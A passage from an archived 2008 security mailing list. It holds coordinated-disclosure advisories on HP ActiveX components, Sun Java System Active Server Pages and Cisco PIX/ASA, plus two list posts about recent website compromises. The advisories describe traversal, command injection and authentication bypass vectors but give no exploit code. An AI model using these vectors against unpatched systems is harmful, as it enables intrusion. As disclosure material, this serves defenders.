vulnerabilities in several parts of that specific software. The affected component are found preinstalled on a broad range of HP equipment but are also installed when a end user visits HP webpage in order to access software updates such as applications, drivers and firmware for multiple HP products. We have discovered eight different vulnerabilities of which five should be considered highly critical since they allow remote code execution. At least five of these vulnerabilities have been confirmed to work in a typical drive-by scenario. All it takes to exploit is to lure a user into visiting a hostile and specifically crafted website. The attack could also be done through SQL and HTML injection. This would allow, if the system is found vulnerable, to run arbitrary code and take complete control of the system or at least with the privileges of the logged on user. In order for this scenario to work it would only require one of the affected ActiveX objects to be installed and Active scripting to be enabled in Microsoft Internet Explorer, which it is by default. The vulnerability was discovered and reported by Dennis Rand from CSIS Security Group. HP has released an advisory and update to address these vulnerabilities. HP Instant Support HPISDataManager.dll Running on Windows, Remote Execution of Arbitrary Code http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c 01422264 Technical advisory with PoC can be downloaded here: http://www.csis.dk/dk/forside/CSIS-RI-0003.pdf -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080604/14efb14f/attachment.html From labs-no-reply at idefense.com Wed Jun 4 15:50:39 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Wed, 04 Jun 2008 10:50:39 -0400 Subject: [Full-disclosure] iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages File Creation Vulnerability Message-ID: <4846ABBF.5050006@idefense.com> iDefense Security Advisory 06.03.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 03, 2008 I. BACKGROUND Sun Java System Active Server Pages is a multi-platform ASP application server. It provides provides ASP (Active Server Pages) functionality to a web server. More information is available at the following URL. http://www.sun.com/software/chilisoft/index.xml II. DESCRIPTION Remote exploitation of a file creation vulnerability in Sun Microsystem's Java System Active Server Pages allows attackers to execute arbitrary code with root privileges. The vulnerability exists within a file included by several ASP applications. This file provides a function that will write the contents contained within its first parameter to a file specified by its second parameter. Several ASP applications allow an attacker to control both the content and the location of the file written. III. ANALYSIS Exploitation allows an attacker to create, or append to, arbitrary files on the system with root privileges. No authentication is required to reach the affected ASP applications. The attacker only needs to be able to establish a session with the administration server on TCP port 5100. IV. DETECTION iDefense has confirmed the existence of this vulnerability within version 4.0.2 of Sun Microsystems Inc.'s Java System Active Server Pages. Older versions are suspected to be vulnerable. V. WORKAROUND In order to prevent exploitation of this vulnerability, disable administration server by executing the following command as the 'root' user. # /opt/casp/admtool -e Additionally, removing the affected ASP applications will prevent exploitation. VI. VENDOR RESPONSE Sun Microsystems has addressed this vulnerability with the release of version 4.0.3 of Sun Java System Active Server Pages. For more information, refer to Sun Alert 238184 at the following URL. http://sunsolve.sun.com/search/document.do?assetkey=1-66-238184-1 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-2401 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 04/04/2007 Initial vendor notification 04/05/2007 Initial vendor response 06/03/2008 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From labs-no-reply at idefense.com Wed Jun 4 15:53:06 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Wed, 04 Jun 2008 10:53:06 -0400 Subject: [Full-disclosure] iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages Buffer Overflow Vulnerability Message-ID: <4846AC52.9030202@idefense.com> iDefense Security Advisory 06.03.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 03, 2008 I. BACKGROUND Sun Java System Active Server Pages is a multi-platform ASP application server. It provides provides ASP (Active Server Pages) functionality to a web server. More information is available at the following URL. http://www.sun.com/software/chilisoft/index.xml II. DESCRIPTION Remote exploitation of a buffer overflow vulnerability in Sun Microsystem's Java System Active Server Pages allows attackers to execute arbitrary code in the context of the ASP server. The vulnerability exists within the request handling code within the ASP server. An attacker supplied string is copied into a fixed size stack buffer without first validating that there is sufficient space available. By supplying a specially crafted request, an attacker can cause a stack-based buffer overflow. III. ANALYSIS Exploitation allows an attacker to execute arbitrary code in the context of the ASP server. This vulnerability can be reached from a normal web server, usually on TCP port 80, configured to pass requests for ASP applications through the ASP server. No authentication is required to exploit this vulnerability. If this service is configured to run with root privileges it is possible to gain complete control over the affected system. IV. DETECTION iDefense has confirmed the existence of this vulnerability within version 4.0.2 of Sun Microsystems Inc.'s Java System Active Server Pages. Older versions are suspected to be vulnerable. V. WORKAROUND iDefense is currently unaware of any effective workaround for this issue. However, configuring the ASP server to run with reduced privileges can help prevent a complete compromise. This can be accomplished via the "Inherit user security" setting or setting a user and group to run with when using the "Defined user security" mode. VI. VENDOR RESPONSE Sun Microsystems has addressed this vulnerability with the release of version 4.0.3 of Sun Java System Active Server Pages. For more information, refer to Sun Alert 238184 at the following URL. http://sunsolve.sun.com/search/document.do?assetkey=1-66-238184-1 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-2404 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 04/04/2007 Initial vendor notification 04/05/2007 Initial vendor response 06/03/2008 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From labs-no-reply at idefense.com Wed Jun 4 15:51:17 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Wed, 04 Jun 2008 10:51:17 -0400 Subject: [Full-disclosure] iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages Information Disclosure Vulnerability Message-ID: <4846ABE5.7040603@idefense.com> iDefense Security Advisory 06.03.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 03, 2008 I. BACKGROUND Sun Java System Active Server Pages is a multi-platform ASP application server. It provides provides ASP (Active Server Pages) functionality to a web server. More information is available at the following URL. http://www.sun.com/software/chilisoft/index.xml II. DESCRIPTION Remote exploitation of an information disclosure vulnerability in Sun Microsystem's Java System Active Server Pages allows attackers to obtain sensitive information. This vulnerability exists due to the placement of the password and configuration data within the application server root directory. By making requests for specific, sensitive documents an attacker could obtain the configuration or password hashes of allowed users. III. ANALYSIS Exploitation allows an attacker to gain sensitive information from the server. No authentication is required to reach the affected ASP applications. The attacker only needs to be able to establish a session with the administration server on TCP port 5100. IV. DETECTION iDefense has confirmed the existence of this vulnerability within version 4.0.2 of Sun Microsystems Inc.'s Java System Active Server Pages. Older versions are suspected to be vulnerable. V. WORKAROUND In order to prevent exploitation of this vulnerability, disable administration server by executing the following command as the 'root' user. # /opt/casp/admtool -e VI. VENDOR RESPONSE Sun Microsystems has addressed this vulnerability with the release of version 4.0.3 of Sun Java System Active Server Pages. For more information, refer to Sun Alert 238184 at the following URL. http://sunsolve.sun.com/search/document.do?assetkey=1-66-238184-1 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-2402 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 04/04/2007 Initial vendor notification 04/05/2007 Initial vendor response 06/03/2008 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From labs-no-reply at idefense.com Wed Jun 4 15:54:50 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Wed, 04 Jun 2008 10:54:50 -0400 Subject: [Full-disclosure] iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages Multiple Command Injection Vulnerabilities Message-ID: <4846ACBA.20900@idefense.com> iDefense Security Advisory 06.03.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 03, 2008 I. BACKGROUND Sun Java System Active Server Pages is a multi-platform ASP application server. It provides provides ASP (Active Server Pages) functionality to a web server. More information is available at the following URL. http://www.sun.com/software/chilisoft/index.xml II. DESCRIPTION Remote exploitation of multiple command injection vulnerabilities in Sun Microsystem's Java System Active Server Pages allows attackers to execute arbitrary code with root privileges. These vulnerabilities exist within several ASP applications that execute shell commands. The problem lies in the fact that these applications do not filter or escape the parameters passed to these commands. By inserting shell meta-characters into an HTTP request, an attacker is able to execute arbitrary shell commands. III. ANALYSIS Exploitation allows an attacker to execute arbitrary shell commands with elevated privileges. Since this server runs with root privileges, an attacker could gain complete control of the affected the system. Note that authentication is required to reach these ASP applications via the administration server on TCP port 5100. However, several methods of bypassing and circumventing authentication have been discovered, rendering that requirement irrelevant. IV. DETECTION iDefense has confirmed the existence of these vulnerabilities within version 4.0.2 of Sun Microsystems Inc.'s Java System Active Server Pages. Older versions are suspected to be vulnerable. V. WORKAROUND Removing the affected ASP applications from the system can prevent exploitation of these vulnerabilities. Additionally, using firewalls to limit access to the administration server (TCP port 5100) and the ASP application server (TCP port 5102) can help mitigate these issues. VI. VENDOR RESPONSE Sun Microsystems has addressed these vulnerabilities with the release of version 4.0.3 of Sun Java System Active Server Pages. For more information, refer to Sun Alert 238184 at the following URL. http://sunsolve.sun.com/search/document.do?assetkey=1-66-238184-1 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-2405 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 05/11/2007 Initial vendor notification 05/11/2007 Initial vendor response 06/03/2008 Coordinated public disclosure IX. CREDIT One of these vulnerabilities was reported to iDefense by an anonymous researcher. Further research by Joshua J. Drake (iDefense Labs) uncovered an additional vulnerability. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From labs-no-reply at idefense.com Wed Jun 4 15:52:19 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Wed, 04 Jun 2008 10:52:19 -0400 Subject: [Full-disclosure] iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages Multiple Directory Traversal Vulnerabilities Message-ID: <4846AC23.3070001@idefense.com> iDefense Security Advisory 06.03.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 03, 2008 I. BACKGROUND Sun Java System Active Server Pages is a multi-platform ASP application server. It provides provides ASP (Active Server Pages) functionality to a web server. More information is available at the following URL. http://www.sun.com/software/chilisoft/index.xml II. DESCRIPTION Remote exploitation of multiple directory traversal vulnerabilities in Sun Microsystem's Java System Active Server Pages allows attackers to obtain the contents of, and delete, sensitive files on the system. Both vulnerabilities exist within ASP applications included with the product. When accessed via the administration server, the ASP engine does not prevent directory traversal using the "../" construct. By supplying a specially crafted HTTP request to one of the affected ASP applications, an attacker is able to read from arbitrary files. One of the applications will disclose only the first and third lines of the file. Once the application is finished processing the file, it will delete it. III. ANALYSIS Exploitation allows an attacker to gain sensitive information from the server. No authentication is required to reach the affected ASP applications. The attacker only needs to be able to establish a session with the administration server on TCP port 5100. Since the server process runs with root privileges, an attacker could obtain the contents of, or delete, any file on the system. It is interesting to note that attempting to exploit these vulnerabilities via the web server results in an error as shown below. [Fri Feb 23 18:16:49 2007] Server object, 80004005, ASP 0175~Disallowed Path Characters~The '..' characters are not allowed in the Path parameter for the MapPath method. IV. DETECTION iDefense has confirmed the existence of these vulnerabilities within version 4.0.2 of Sun Microsystems Inc.'s Java System Active Server Pages. Older versions are suspected to be vulnerable. V. WORKAROUND In order to prevent exploitation of these vulnerabilities, disable administration server by executing the following command as the 'root' user. # /opt/casp/admtool -e Additionally, removing the affected ASP applications will prevent exploitation of these vulnerabilities. VI. VENDOR RESPONSE Sun Microsystems has addressed these vulnerabilities with the release of version 4.0.3 of Sun Java System Active Server Pages. For more information, refer to Sun Alert 238184 at the following URL. http://sunsolve.sun.com/search/document.do?assetkey=1-66-238184-1 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-2403 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 04/04/2007 Initial vendor notification 04/05/2007 Initial vendor response 06/03/2008 Coordinated public disclosure IX. CREDIT The discoverer of these vulnerabilities wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From labs-no-reply at idefense.com Wed Jun 4 15:55:10 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Wed, 04 Jun 2008 10:55:10 -0400 Subject: [Full-disclosure] iDefense Security Advisory 06.03.08: Sun Java System Active Server Pages Authorization Bypass Vulnerability Message-ID: <4846ACCE.50502@idefense.com> iDefense Security Advisory 06.03.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 03, 2008 I. BACKGROUND Sun Java System Active Server Pages is a multi-platform ASP application server. It provides provides ASP (Active Server Pages) functionality to a web server. More information is available at the following URL. http://www.sun.com/software/chilisoft/index.xml II. DESCRIPTION Remote exploitation of design error in Sun Microsystem's Java System Active Server Pages allows attackers to bypass administration server authentication mechanisms. The vulnerability exists due to improper design of the ASP application server. The administration application server exists as a stand-alone service that listens on TCP port 5102. By connecting directly to this service and making requests, attackers are able to bypass authentication mechanisms introduce by the administration HTTP server. III. ANALYSIS Exploitation allows an attacker to bypass authentication restrictions imposed by the HTTP server. No authentication is required to communicate with the affected administration application server. The attacker only needs to be able to establish a session with the administration application server on TCP port 5102. IV. DETECTION iDefense has confirmed the existence of this vulnerability within version 4.0.2 of Sun Microsystems Inc.'s Java System Active Server Pages. Older versions are suspected to be vulnerable. V. WORKAROUND In order to prevent exploitation of this vulnerability, disable administration server by executing the following command as the 'root' user. # /opt/casp/admtool -e VI. VENDOR RESPONSE Sun Microsystems has addressed this vulnerability with the release of version 4.0.3 of Sun Java System Active Server Pages. For more information, refer to Sun Alert 238184 at the following URL. http://sunsolve.sun.com/search/document.do?assetkey=1-66-238184-1 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-2406 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 05/11/2007 Initial vendor notification 05/11/2007 Initial vendor response 06/03/2008 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From xploitable at gmail.com Wed Jun 4 17:31:51 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 4 Jun 2008 17:31:51 +0100 Subject: [Full-disclosure] Metasploit - Hack ? In-Reply-To: <200806021257.31737.fdlist@digitaloffense.net> References: <200806021257.31737.fdlist@digitaloffense.net> Message-ID: <4b6ee9310806040931v454c83dcpc64056f22a72c814@mail.gmail.com> On Mon, Jun 2, 2008 at 6:57 PM, H D Moore wrote: > Looks like someone is doing ARP poisoning at the ISP level. The actual > metasploit.com server(s) are untouched, but someone is still managing to > MITM a large portion of the incoming traffic. To make things even more > fun, its cooinciding with a DoS attack (syn floods) on most of the open > services. > > If you are worried about the the Metasploit Framework source code being > MITM'd during SVN checkouts, use the SSL version of the SVN tree: > > $ svn co https://metasploit.com/svn/framework3/trunk/ > > -HD > > > On Monday 02 June 2008, Jacques Erasmus wrote: >> Seems like the metasploit site has been hacked. > > I found this post [1] on my news group it sounds like an awful coincidence though. [1] http://groups.google.com/group/n3td3v/browse_thread/thread/41b832968eacf1d9 All the best, n3td3v From xploitable at gmail.com Wed Jun 4 17:42:49 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 4 Jun 2008 17:42:49 +0100 Subject: [Full-disclosure] Fwd: Comments on: Phoenix Mars Lander site hacked In-Reply-To: <376417779.20080603012652@smtp.xlhost.de> References: <4b6ee9310806021235i1a314511vf110bbd582f526ee@mail.gmail.com> <4b6ee9310806021312y58044239ifee07431c7597910@mail.gmail.com> <119405.1212440467@turing-police.cc.vt.edu> <4b6ee9310806021417yd071d9dhf9cdaa5fc567991a@mail.gmail.com> <376417779.20080603012652@smtp.xlhost.de> Message-ID: <4b6ee9310806040942g59ffa15t8ad84fff62c66214@mail.gmail.com> On Tue, Jun 3, 2008 at 12:26 AM, kat wrote: > Brazil! > No, infact not, but Zone-H rats have been able to shed light on the origin of the attackers. http://www.zone-h.org/content/view/14948/1/ I can't believe I just gave this site hits, but it helps solve the mystery!!! The day Zone-H closes shop, the day I party like a mother fo! All the best, n3td3v From psirt at cisco.com Wed Jun 4 17:25:00 2008 From: psirt at cisco.com (Cisco Systems Product Security Incident Response Team) Date: Wed, 04 Jun 2008 18:25:00 +0200 Subject: [Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Cisco PIX and Cisco ASA Message-ID: <200806041821.asa@psirt.cisco.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in Cisco PIX and Cisco ASA Document ID: 105444 Advisory ID: cisco-sa-20080604-asa http://www.cisco.com/warp/public/707/cisco-sa-20080604-asa.shtml Revision 1.0 For Public Release 2008 June 04 1600 UTC (GMT) - --------------------------------------------------------------------- Summary ======= Multiple vulnerabilities exist in the Cisco ASA 5500 Series Adaptive Security Appliances and Cisco PIX Security Appliances. This security advisory outlines details of these vulnerabilities: * Crafted TCP ACK Packet Vulnerability * Crafted TLS Packet Vulnerability * Instant Messenger Inspection Vulnerability * Vulnerability Scan Denial of Service * Control-plane Access Control List Vulnerability The first four vulnerabilities may lead to a denial of service (DoS) condition and the fifth vulnerability may allow an attacker to bypass control-plane access control lists (ACL). Note: These vulnerabilities are independent of each other. A device may be affected by one vulnerability and not affected by another. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate some of these vulnerabilities are available. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080604-asa.shtml Affected Products ================= Vulnerable Products +------------------ The following are the details about each vulnerability described within this advisory. Crafted TCP ACK Packet Vulnerability +----------------------------------- Cisco ASA and Cisco PIX devices are affected by a crafted TCP acknowledgment (ACK) packet vulnerability. Software versions prior to 7.1(2)70 on the 7.1.x release, 7.2(4) on the 7.2.x release, and 8.0 (3)10 on the 8.0.x release are affected. Cisco ASA or Cisco PIX security appliances running software version 7.0.x, or 8.1.x are not vulnerable. Cisco ASA and Cisco PIX devices running versions 7.1.x and 7.2.x with WebVPN, SSL VPN, or ASDM enabled are affected by this vulnerability. Devices running software versions on the 8.0 release that are configured for Telnet, Secure Shell (SSH), WebVPN, SSL VPN, or ASDM enabled are affected by this vulnerability. Note: Devices running IPv4 and IPv6 are affected by this vulnerability. Crafted TLS Packet Vulnerability +------------------------------- Cisco ASA and Cisco PIX devices are affected by a crafted TLS request vulnerability if the HTTPS server on the Cisco ASA or Cisco PIX device is enabled and is running software versions prior to 8.0(3)9 on the 8.0.x release or prior to version 8.1(1)1 on the 8.1.x release. Cisco ASA and Cisco PIX appliances running software versions 7.x are not vulnerable. Instant Messenger Inspection Vulnerability +----------------------------------------- Cisco ASA and Cisco PIX devices are affected by a crafted packet vulnerability if Instant Messaging Inspection is enabled and the device is running software versions prior to 7.2(4) on the 7.2.x release, 8.0(3)10 on the 8.0.x release, or 8.1(1)2 on the 8.1.x release. Devices running software versions in the 7.0.x and 7.1.x releases are not vulnerable. Additionally, devices that do not have Instant Messaging Inspection enabled are not vulnerable. Note: Instant Messaging Inspection is disabled by default. Vulnerability Scan Denial of Service +----------------------------------- Cisco ASA and Cisco PIX devices are affected by a vulnerability (port) scan denial of service vulnerability if the device is running software versions prior to 7.2(3)2 on the 7.2.x release or 8.0(2)17 on the 8.0.x release. Cisco ASA and Cisco PIX devices running software versions 7.0.x, 7.1.x, or 8.1.x are not vulnerable. Control-plane Access Control List Vulnerability +---------------------------------------------- Cisco ASA and Cisco PIX devices are affected by a vulnerability if the device is configured to use control-plane ACLs and if it is running software versions prior to 8.0(3)9 on the 8.0.x release. Devices running software versions 7.x or 8.1.x are not vulnerable. Note: Control-plane ACLs were first introduced in software version 8.0(2). The control-plane ACLs are not enabled by default. The show version command-line interface (CLI) command can be used to determine if a vulnerable version of the Cisco PIX or Cisco ASA software is running. The following example shows a Cisco ASA Security Appliance that runs software release 8.0(2): ASA# show version Cisco Adaptive Security Appliance Software Version 8.0(2) Device Manager Version 6.0(1) [...] Customers who use the Cisco Adaptive Security Device Manager (ASDM) to manage their devices can find the version of the software displayed in the table in the login window or in the upper left corner of the ASDM window. Products Confirmed Not Vulnerable +-------------------------------- The Cisco Firewall Services Module (FWSM) is not affected by any of these vulnerabilities. Cisco PIX security appliances running versions 6.x are not vulnerable. No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= This Security Advisory describes multiple distinct vulnerabilities. These vulnerabilities are independent of each other. 1. Crafted TCP ACK Packet Vulnerability +-------------------------------------- A crafted TCP ACK packet may cause a denial of service condition on the Cisco ASA or Cisco PIX security appliances. Only packets destined to the device (not transiting the device) may trigger the effects of this vulnerability. Cisco ASA and Cisco PIX devices running versions 7.1.x and 7.2.x with WebVPN, SSL VPN, or ASDM enabled are affected by this vulnerability. Devices running software versions on the 8.0 release that are configured for Telnet, Secure Shell (SSH), WebVPN, SSL VPN, or ASDM enabled are affected by this vulnerability. The telnet command is used identify the IP addresses from which the security appliance accepts Telnet connections. ASA(config)# telnet 192.168.10.0 255.255.255.0 inside In the previous example, the Cisco ASA is configured to accept Telnet connections on the inside interface from the 192.168.10.0/24 network. Note: You cannot use Telnet to the lowest security interface unless you use Telnet inside an IPSec tunnel. ASDM management sessions are enabled via the http server enable and http commands. The ssh command is used identify the IP addresses from which the security appliance accepts SSH connections. For example: ASA(config)# ssh 192.168.10.0 255.255.255.0 inside In the previous example the Cisco ASA is configured to accept SSH connections on the inside interface from the 192.168.10.0/24 network. Clientless WebVPN, SSL VPN Client, and AnyConnect connections are enabled via the webvpn command. For example, the following configuration shows a Cisco ASA with WebVPN configured and enabled. In this case the ASA will listen for WebVPN connections on the default port, TCP port 443: http server enable ! webvpn enable outside Note that with this particular configuration, the device is vulnerable to attacks coming from the outside interface. This vulnerability is documented in Cisco Bug ID CSCsm84110 and has been assigned Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-2055. 2. Crafted TLS Packet Vulnerability +---------------------------------- Transport Layer Security (TLS) is the replacement for the Secure Socket Layer (SSL) protocol. It is a protocol that provides, via cryptography, secure communications between two end-points. The Cisco PIX and Cisco ASA security appliances rely on TLS to protect the confidentiality of communications in a variety of scenarios. In all these scenarios, the PIX and ASA may be affected by a vulnerability in the handling of the TLS protocol that may lead to a reload of the device when it processes specially crafted TLS packets. Note: Only packets destined to the device (not transiting the device) may trigger the effects of this vulnerability. The following list contains some of the applications within the Cisco ASA and Cisco PIX devices that use TLS: * Clientless WebVPN, SSL VPN Client, and AnyConnect Connections * ASDM (HTTPS) Management Sessions * Cut-Through Proxy for Network Access * TLS Proxy for Encrypted Voice Inspection Clientless WebVPN, SSL VPN Client, and AnyConnect Connections +------------------------------------------------------------ Clientless WebVPN, SSL VPN Client, and AnyConnect connections are enabled via the webvpn command. For example, the following configuration shows a Cisco ASA with WebVPN configured and enabled. In this case the ASA will listen for WebVPN connections on the default port, TCP port 443: http server enable ! webvpn enable outside Note that with this particular configuration, the device is vulnerable to attacks coming from the outside interface. ASDM (HTTPS) Management Sessions +------------------------------- ASDM management sessions are enabled via the http server enable and http commands. For example, the following configuration shows an ASA configured for remote HTTPS management: http server enable http 192.168.0.0 255.255.255.0 inside Note that with this particular configuration the device is vulnerable to attacks coming from the inside interface and from the 192.168.0.0/ 24 IP sub-network. Cut-Through Proxy for Network Access +------------------------------------ The cut-through proxy feature is used to authenticate users before they can access the network. The following is an example of a configuration that requires users to authenticate before they can be granted network access: access-list auth-proxy extended permit tcp any any eq www access-list auth-proxy extended permit tcp any any eq telnet access-list auth-proxy extended permit tcp any any eq https ! aaa authentication match auth-proxy inside LOCAL aaa authentication secure-http-client aaa authentication listener https inside port https A configuration affected by this vulnerability will contain the command aaa authentication secure-http-client or aaa authentication listener https inside port . Note that with the configuration in the preceding example, the device is vulnerable to attacks coming from the inside interface. TLS Proxy for Encrypted Voice Inspection +--------------------------------------- The TLS proxy for encrypted voice inspection feature allows the security appliance to decrypt, inspect and modify (as needed, for example, performing NAT fixup), and re-encrypt voice signaling traffic while all of the existing VoIP inspection functions for SCCP and Session Initiation Protocol (SIP) protocols are preserved. Once voice signaling is decrypted, the plain-text signaling message is passed to the existing inspection engines. The security appliance accomplishes this by acting as a TLS proxy between the IP phone and Cisco Unified CallManager and Cisco Unified Communications Manager, which implies that TLS sessions are terminating on the security appliance. This is done over TCP ports 2443 and 5061. To determine whether the Cisco PIX or Cisco ASA security appliance is configured to support inspection of encrypted voice, log in to the device and issue the CLI command show service-policy | include tls. If the output contains the text tls-proxy: active and some statistics, then the device has a vulnerable configuration. The following example shows a vulnerable Cisco ASA Security Appliance: ASA# show service-policy | include tls Inspect: sip tls-proxy myproxy, packet 0, drop 0, reset-drop 0 tls-proxy: active sess 0, most sess 0, byte 0 Inspect: skinny tls-proxy myproxy, packet 0, drop 0, reset-drop 0 tls-proxy: active sess 0, most sess 0, byte 0 ASA# This vulnerability is documented in Cisco Bug ID CSCsm26841 and has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-2056. 3. Instant Messenger Inspection Vulnerability +-------------------------------------------- The Cisco ASA and Cisco PIX Instant Messenger (IM) inspection engine is used to apply fine grained controls on the IM application usage within your network. The Cisco ASA and Cisco PIX is affected by a denial of service vulnerability if the Instant Messaging Inspection is enabled. More information on the IM inspection feature and its configuration can be found at: http://www.cisco.com/en/US/docs/security/asa/asa80/configuration/guide/inspect.html#wp1479354 This vulnerability is documented in Cisco Bug ID CSCso22981 and has been assigned Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-2057. 4. Vulnerability Scan Denial of Service +-------------------------------------- The Cisco ASA and Cisco PIX security appliances are affected by a denial of service vulnerability when a vulnerability scan is conducted against TCP port 443. Certain vulnerability (port) scanners will cause the system to reload. Note: This vulnerability is affected by traffic destined to the device on TCP port 443. The Cisco ASA and Cisco PIX security appliances use TCP port 443 for Clientless WebVPN, SSL VPN Client, AnyConnect client connections, HTTPS Management Sessions, Cut-Through Proxy for Network Access, and TLS Proxy for Encrypted Voice Inspection. Please refer to the details of the Crafted TLS Packet Vulnerability for additional information on these services. This vulnerability is documented in Cisco Bug ID CSCsj60659 and has been assigned Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-2058. 5. Control-plane Access Control List Vulnerability +------------------------------------------------- Control-plane ACLs are designed to protect traffic destined to the security appliance. A vulnerability exist in the Cisco ASA and Cisco PIX security appliances where a 